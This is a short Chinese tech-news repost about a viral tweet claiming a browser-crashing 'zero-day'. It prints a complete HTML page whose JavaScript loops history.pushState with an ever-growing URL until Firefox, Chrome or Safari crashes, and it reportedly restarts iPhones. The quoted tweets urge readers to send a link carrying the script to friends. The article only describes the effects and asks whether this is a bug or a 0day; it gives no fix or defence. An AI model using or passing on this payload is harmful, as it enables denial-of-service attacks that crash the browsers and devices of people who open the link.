这十二行代码是如何让浏览器爆炸的？

今天刷推特的时候发现 Cyber Security@cyber__sec 的推文让人眼前一亮：

Crash firefox， chrome, safari browsers, and also restart iphone using this javascript code. #dos #0day #exploit

//使用下面这段 JavaScript 代码能让 firefox，chrome，safari 浏览器崩溃，而且还能让 iphone 重启。

继续在推特上深挖发现 IT Security Tweets ™ @F1r3h4nd 于 17 日发推：

Crash your friend’s browser and restart Iphone with a link which has this script: #0day

//把带有下面这个脚本的链接发给你的朋友，能让你朋友的浏览器崩溃，而且让 Iphone 重启。

完整 HTML 代码如下：

<html>
<body>
<script>
var total="";
for (var i=0;i<1000000;i++)
{
    total= total+i.toString ();
    history.pushState (0,0,total);
}
</script>
</body>
</html>

接来下会发生什么？

点开以后，我的状态是这样的：

如果你是 PC 端用户，点开链接以后，电脑 CPU 内存极有可能一路狂飙直至浏览器崩溃卡死！

如果你是移动端（安卓、iPhone）用户，点开链接以后你的浏览器会闪退！在微博、微信客户端点开链接同样会闪退。iPhone 用 Safari 打开之后链接之后，手机注销重启了！…

　　思考

这是 Bug 还是 0day？为什么会有这一现象？如何实现的？

本文文字及图片出自 www.freebuf.com

你也许感兴趣的：

• 【外评】谷歌浏览器（Google Chrome）将关闭扩展系统 Manifest V2，开启更严格的 Manifest V3
• Chrome 浏览器开发工具(DevTools)现在使用双子座(Gemini )来帮助处理控制台中的 JavaScript 错误
• 【Chromium Blog】机器学习如何改进 Windows、Mac 和 ChromeOS 上的 Chrome 浏览器地址栏
• 欧盟新科技法正在发挥作用–小型浏览器赢得市场份额
• 都 2024 年了还要兼容 IE
• 【译文】Firefox的衰落：Mozilla 曾经风靡一时的火狐浏览器渐行渐远
• 【译文】微软在 Edge 上不断作死
• 曾打败 IE 的 Firefox，正处于崩溃边缘！
• 微软在 Windows 11 上强推 exe 软件弹窗，只为让 Chrome 用户尝试 Bing ？！
• Safari 版本更新？开发者的噩梦之旅！